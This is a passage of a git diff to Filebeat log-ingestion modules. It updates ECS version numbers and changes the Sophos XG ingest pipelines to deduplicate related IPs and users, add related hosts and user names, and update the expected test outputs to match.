add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml index 7ce5c570372d..ca371361192a 100644 --- a/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml +++ b/x-pack/filebeat/module/snyk/vulnerabilities/config/config.yml @@ -96,4 +96,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml index 26340d167fc1..6c6188a7022b 100644 --- a/x-pack/filebeat/module/sonicwall/firewall/config/input.yml +++ b/x-pack/filebeat/module/sonicwall/firewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/sophos/utm/config/input.yml b/x-pack/filebeat/module/sophos/utm/config/input.yml index 07c7fdcbb183..0d4e59f4f42b 100644 --- a/x-pack/filebeat/module/sophos/utm/config/input.yml +++ b/x-pack/filebeat/module/sophos/utm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/sophos/xg/config/config.yml b/x-pack/filebeat/module/sophos/xg/config/config.yml index 5a35058a55b3..676d19f05d30 100644 --- a/x-pack/filebeat/module/sophos/xg/config/config.yml +++ b/x-pack/filebeat/module/sophos/xg/config/config.yml @@ -27,7 +27,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - add_fields: target: '_conf' fields: diff --git a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml index bb2548bf941b..a5c0b7c32cdd 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml @@ -315,16 +315,18 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" - ############# ## Cleanup ## ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/atp.yml b/x-pack/filebeat/module/sophos/xg/ingest/atp.yml index df6ed8b35cab..c659264d633e 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/atp.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/atp.yml @@ -206,14 +206,17 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml b/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml index a9dedb4070fd..0b5f92c1e699 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/cfilter.yml @@ -237,14 +237,17 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/event.yml b/x-pack/filebeat/module/sophos/xg/ingest/event.yml index 2565434a6f01..7d5c397587aa 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/event.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/event.yml @@ -151,6 +151,11 @@ processors: field: source.user.name value: '{{sophos.xg.name}}' if: "ctx.sophos?.xg?.name != null" +- set: + field: user.name + value: '{{source.user.name}}' + ignore_empty_value: true + if: 'ctx.sophos?.xg?.log_subtype == "Authentication"' - rename: field: sophos.xg.usergroupname target_field: source.user.group.name diff --git a/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml b/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml index a9ad2eb988c9..43ab892b8cca 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/firewall.yml @@ -401,22 +401,27 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.ip value: '{{source.nat.ip}}' + allow_duplicates: false if: 'ctx?.source?.nat?.ip != null' - append: field: related.ip value: '{{destination.nat.ip}}' + allow_duplicates: false if: 'ctx?.destination?.nat?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/idp.yml b/x-pack/filebeat/module/sophos/xg/ingest/idp.yml index f10f964eb13a..efd049cb580c 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/idp.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/idp.yml @@ -203,16 +203,17 @@ processors: - append: if: 'ctx?.source?.ip != null' field: related.ip - value: - - '{{source.ip}}' + value: '{{source.ip}}' + allow_duplicates: false - append: if: 'ctx?.destination?.ip != null' field: related.ip - value: - - '{{destination.ip}}' + value: '{{destination.ip}}' + allow_duplicates: false - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml index 8102bb925148..ef8599270e09 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml @@ -198,6 +198,11 @@ processors: } } ctx["host"]["name"] = name; +- append: + field: related.hosts + value: '{{host.name}}' + allow_duplicates: false + if: 'ctx.host?.name != null' ############# ## Cleanup ## diff --git a/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml b/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml index dce06fd1776d..53f4a2f1884c 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/sandstorm.yml @@ -106,14 +106,17 @@ processors: - append: field: related.ip value: "{{source.ip}}" + allow_duplicates: false if: "ctx.source?.ip != null" - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" - append: field: related.hash value: "{{file.hash.sha1}}" + allow_duplicates: false if: "ctx.file?.hash?.sha1 != null" - remove: field: diff --git a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml index 3cbf13834675..8e58395a3bfc 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml @@ -250,14 +250,17 @@ processors: - append: field: related.ip value: '{{source.ip}}' + allow_duplicates: false if: 'ctx?.source?.ip != null' - append: field: related.ip value: '{{destination.ip}}' + allow_duplicates: false if: 'ctx?.destination?.ip != null' - append: field: related.user value: "{{source.user.name}}" + allow_duplicates: false if: "ctx.source?.user?.name != null" ############# diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json index a78e3c1ccb0d..044a0b01f339 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-spam.log-expected.json @@ -32,6 +32,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "server.bytes": 0, "server.port": 0, "service.type": "sophos", @@ -104,6 +107,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "server.bytes": 0, "server.ip": "185.8.209.194", "server.port": 25, @@ -192,6 +198,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "server.bytes": 0, "server.ip": "185.8.209.194", "server.port": 25, @@ -280,6 +289,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "server.bytes": 0, "server.ip": "185.8.209.194", "server.port": 25, @@ -355,6 +367,9 @@ "observer.serial_number": "C44313350024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.233.61", "server.port": 25, @@ -423,6 +438,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.234.240", "server.port": 25, @@ -491,6 +509,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.17.121", "server.port": 25, @@ -557,6 +578,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.16.204", "server.port": 25, @@ -624,6 +648,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.17.121", "server.port": 25, @@ -688,6 +715,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.17.121", "server.port": 25, @@ -755,6 +785,9 @@ "observer.serial_number": "C44313350024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "server.bytes": 0, "server.ip": "10.198.233.61", "server.port": 110, diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json index 42590edbb335..65b2d6abdfdd 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json @@ -46,6 +46,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.34.24", "13.226.155.93" @@ -124,6 +127,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.16.34.24", "13.226.155.18" @@ -199,6 +205,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "82.165.194.211", "186.8.209.194" @@ -284,6 +293,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "23.254.247.78", "185.7.209.194" @@ -365,6 +377,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.16.121", "10.198.234.240" @@ -436,6 +451,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.16.121", "10.198.234.240" @@ -509,6 +527,9 @@ "observer.serial_number": "SFDemo-2df0960", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.146.13.49", "10.8.142.181" @@ -574,6 +595,9 @@ "observer.serial_number": "SFDemo-2df0960", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.146.13.49", "10.8.142.181" diff --git a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json index 38c2694478e7..a0230cb1dc49 100644 --- a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json @@ -40,6 +40,9 @@ "observer.serial_number": "C44310050024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.71", "46.161.30.47" @@ -112,6 +115,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.16.34.24", "13.226.155.22" @@ -180,6 +186,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.34.24", "13.226.155.22" @@ -245,6 +254,9 @@ "observer.serial_number": "C30006T22TGR89B", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.32.89", "82.211.30.202" diff --git a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json index 84dc15e1aeb7..c8bb6001058b 100644 --- a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json @@ -38,6 +38,9 @@ "observer.serial_number": "C44310050024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.71", "182.79.221.19" @@ -114,6 +117,9 @@ "observer.serial_number": "S110000E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "5.5.5.15", "216.58.197.44" @@ -189,6 +195,9 @@ "observer.serial_number": "S110016E28BA631", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "5.5.5.15", "74.125.130.188" @@ -270,6 +279,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.34.10", "13.79.168.201" @@ -344,6 +356,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.34.15", "40.90.137.127" @@ -416,6 +431,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.34.15", "91.228.167.133" @@ -471,6 +489,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.108.108.49" ], @@ -537,6 +558,9 @@ "observer.serial_number": "C01001K234RXPA1", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "192.168.73.220", "64.233.189.147" @@ -609,6 +633,9 @@ "observer.serial_number": "C01001K234RXPA1", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "192.168.73.220", "64.233.188.94" diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json index 89d6878ec6f5..a237d2d2a362 100644 --- a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json @@ -27,6 +27,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.35.116" ], @@ -50,7 +53,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2020-05-18T14:38:58.000-02:00", @@ -80,6 +84,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "83.20.132.250", "214.167.51.66" @@ -137,6 +144,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.connectiontype": "0", "sophos.xg.device": "SFW", @@ -180,6 +190,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "83.9.140.96" ], @@ -211,7 +224,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2020-05-18T14:39:01.000-02:00", @@ -239,6 +253,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -274,6 +291,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -318,6 +338,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "217.250.157.135" ], @@ -349,7 +372,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2020-05-18T14:39:04.000-02:00", @@ -372,6 +396,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.user": [ "elastic.user@elastic.test.com" ], @@ -420,6 +447,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "91.67.201.4" ], @@ -452,7 +482,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "hendrikl" }, { "@timestamp": "2020-05-18T14:39:06.000-02:00", @@ -473,6 +504,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -510,6 +544,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.66.35.15" ], @@ -556,6 +593,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", @@ -591,6 +631,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "service.type": "sophos", "sophos.xg.backup_mode": "'appliance' ", "sophos.xg.device": "SFW", @@ -637,6 +680,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "10.84.234.38" ], @@ -663,7 +709,8 @@ "tags": [ "sophos-xg", "forwarded" - ] + ], + "user.name": "elastic.user@elastic.test.com" }, { "@timestamp": "2018-06-06T11:12:10.000-02:00", @@ -684,6 +731,9 @@ "observer.serial_number": "S4000806149EE49", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "SG430", diff --git a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json index 7f1e5d9190be..35557e557da9 100644 --- a/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/firewall.log-expected.json @@ -60,6 +60,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.34.15", "91.228.167.86", @@ -174,6 +177,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.66.155", "91.228.165.117", @@ -276,6 +282,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.35.113", "172.20.4.52" @@ -359,6 +368,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.82.234.6", "192.168.0.1" @@ -453,6 +465,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "51.77.56.9", "185.7.209.207" @@ -547,6 +562,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "172.17.35.101", "192.168.5.11" @@ -636,6 +654,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.16.36.105", "10.84.234.14" @@ -718,6 +739,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.82.234.9", "10.82.234.11" @@ -805,6 +829,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.84.234.7", "172.16.34.50" @@ -896,6 +923,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "192.168.1.254", "172.17.32.19" @@ -983,6 +1013,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "172.17.35.119", "172.16.34.10" @@ -1074,6 +1107,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.32.19", "8.8.8.8" @@ -1154,8 +1190,10 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ - "0.0.0.0", "0.0.0.0" ], "rule.id": "0", @@ -1235,6 +1273,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.38.184", "10.198.39.255" @@ -1318,6 +1359,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.32.19", "10.198.32.48" @@ -1396,6 +1440,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.37.23", "10.198.36.48" @@ -1483,6 +1530,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.12.19", "8.8.8.8" @@ -1564,6 +1614,9 @@ "observer.serial_number": "SFDemo-763180a", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "fe80::59f5:3ce8:c98e:5062", "ff02::1:2" @@ -1644,6 +1697,9 @@ "observer.serial_number": "SFDemo-9a04c43", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.37.57", "10.198.32.19" @@ -1736,6 +1792,9 @@ "observer.serial_number": "SFDemo-9a04c43", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.37.57", "72.163.4.185" diff --git a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json index d92a2b2e7e41..2dcaffd634e3 100644 --- a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json @@ -32,6 +32,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "89.40.182.58", "172.16.68.20" @@ -104,6 +107,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "117.50.11.192", "172.16.66.155" @@ -178,6 +184,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "77.61.185.101", "172.16.68.20" @@ -250,6 +259,9 @@ "observer.serial_number": "SFDemo-f64dd6be", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.0.0.168", "10.1.1.234" @@ -315,6 +327,9 @@ "observer.serial_number": "SFDemo-f64dd6be", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.0.1.31", "10.1.0.115" diff --git a/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json index ed32ee3f2132..acae45ad376e 100644 --- a/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/sandbox.log-expected.json @@ -28,6 +28,9 @@ "observer.serial_number": "C44310050024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "CR750iNG-XP", @@ -77,6 +80,9 @@ "related.hash": [ "83cd339302bf5e8ed5240ca6383418089c337a81" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.112" ], @@ -130,6 +136,9 @@ "observer.serial_number": "C44313350024-P29PUA", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "CR750iNG-XP", @@ -178,6 +187,9 @@ "related.hash": [ "3ce799580908df9ca0dc649aa8c2d06ab267e8c8" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.112" ], @@ -237,6 +249,9 @@ "related.hash": [ "3ce799580908df9ca0dc649aa8c2d06ab267e8c8" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "10.198.47.112" ], @@ -296,6 +311,9 @@ "related.hash": [ "d910c4a81122c360fe57f67a04999425a65249db" ], + "related.hosts": [ + "firewall.localgroup.local" + ], "related.ip": [ "172.16.34.24" ], diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json index ceed76baef16..9a3920dc1689 100644 --- a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json @@ -42,6 +42,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "89.68.140.204", "185.8.209.207" @@ -123,6 +126,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "89.68.140.204", "185.8.209.207" @@ -196,6 +202,9 @@ "observer.serial_number": "1234567890123457", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], "related.ip": [ "10.198.235.254", "10.198.233.48" @@ -264,6 +273,9 @@ "observer.serial_number": "1234567890123456", "observer.type": "firewall", "observer.vendor": "Sophos", + "related.hosts": [ + "my_fancy_host" + ], "related.ip": [ "10.198.235.254", "10.198.233.48" @@ 